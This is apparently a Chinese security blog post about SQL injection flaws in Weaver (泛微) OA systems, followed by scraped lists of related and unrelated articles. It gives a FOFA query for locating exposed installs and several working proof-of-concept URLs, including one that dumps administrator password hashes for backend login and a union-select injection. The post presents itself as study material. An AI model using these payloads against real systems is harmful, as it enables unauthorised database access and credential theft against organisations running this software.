2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。

漏洞描述

泛微OA不同版本都存在SQL注入漏洞

FOFA

app=“泛微-协同办公OA”

漏洞复现

1、泛微OA V8 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

返回了数据库第一条记录的值
通过解密后,可以登录后台(漏洞原理可参考附录文章)

2、泛微OA某版本的SQL注入漏洞(核实中)

POC

http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user

3、后台SQL注入

使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

管理员情况下的注入:

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:

http://xx.cn//cowork/CoworkLogView.jsp?id=151

普通用户注入地址:

http://xx.cn/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址:

http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3

继续收集中,未完待续…

参考文章

泛微OA V8 SQL注入漏洞

泛微OA-SQL注入漏洞相关推荐

  1. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  2. 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

    0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

  3. CNVD-2023-12632 泛微e-cology9 sql注入 附poc

    目录 漏洞描述 影响版本 漏洞复现 漏洞修复 众亦信安,中意你啊! 微信搜索:众亦信安,回复关键字:230317 领批量检测脚本. 声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如 ...

  4. 2022-10-10(通达OA SQL注入漏洞)

    文章目录 漏洞描述 环境搭建 漏洞利用 id参数存在sql注入 starttime参数 orderby参数 id参数存在sql注入 修复建议 参考 漏洞描述 通达OA 11.5版本,存在sql注入 环 ...

  5. E-office OA SQL注入漏洞复现

    目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 泛微e-office

  6. 【文档留存】泛微OA POC

    泛微OA &&POC 泛微OA 多版本存在命令执行 POC&EXP来源于网络 漏洞描述: 泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者 ...

  7. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  8. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  9. 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

    漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...

  10. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

最新文章

  1. c++11随机数产生器default_random_engine
  2. mysql金库模式_Python vault-anyconfig包_程序模块 - PyPI - Python中文网
  3. 这是一篇优雅的Springboot2.0使用手册
  4. 有这10个特征的项目领导者做的项目,失败率增加60%
  5. 软件开发人员的“七重苦”(2)
  6. Spring的Lifecycle
  7. How to Leak a Context: Handlers Inner Classes
  8. 使用ajax怎么解决乱码问题,一句话解决AJAX中文乱码问题[推荐]
  9. 链上结构化产品Ribbon将推出基于看跌期权的资管产品Puts Theta Vault
  10. apache+php+mysq环境详细l配置
  11. 干货 | 万字长文带你复习线性代数!
  12. Spark RDD、DataFrame和DataSet的区别
  13. 干货分享 | 工业信息数据库安全现状与技术分析
  14. UDP视频聊天室(一)
  15. 医疗行业能否成功入场直播带货?
  16. 【算法Algorithm】计数(Count)排序
  17. 使用IDEA完成支付宝开放平台的Demo测试
  18. IPv6的TSO/GRO/GSO及其Linux实现的不妥
  19. 乐鑫M5GO自制睡眠小助手!新手。。。轻打脸
  20. 想让人瞬间死心只能豁出去把自己和一种恶心的东西连接在一起,一旦生理反抗达成。想不死心也不行。

热门文章

  1. cad计算机绘图实训内容,cad绘图实训心得体会
  2. Unity基础知识之协程
  3. 一篇文章搞懂数据仓库:元数据分类、元数据管理
  4. windows 安装 telnet 工具
  5. OneNote 安装代码高亮插件 NoteHightlight的安装及使用基础教程
  6. Matlab中S-函数的编写
  7. nexus下载 通过官网下载
  8. RHCSA红帽认证考点2022(红帽认证系统管理员)
  9. 前端优秀框架jQuery weui推荐
  10. LoRa无线网络技术概述